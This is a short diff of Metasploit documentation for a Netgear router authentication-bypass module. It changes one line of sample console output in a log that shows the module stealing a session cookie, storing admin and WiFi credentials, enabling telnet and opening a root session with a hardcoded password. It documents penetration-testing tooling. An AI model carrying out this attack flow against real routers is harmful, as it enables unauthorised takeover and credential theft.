rapid7/metasploit-framework/documentation/modules/auxiliary/admin/http/netgear_pnpx_getsharefolderlist_auth_bypass.md

     [*] Sending one request to grab authorization cookie from headers...
     [*] Got the authentication cookie, associating it with a logged in session...
     [+] Successfully logged into target router using the stolen credentials!
-    [*] Attempting to store credentials for future use...
+    [*] Attempting to store stolen admin and WiFi credentials for future use...
     [*] Enabling telnet on the target router...
     [+] Telnet enabled on target router!
     [*] Attempting to log in with admin:theRiverOfNope123!.
 You should get a new telnet session as the root user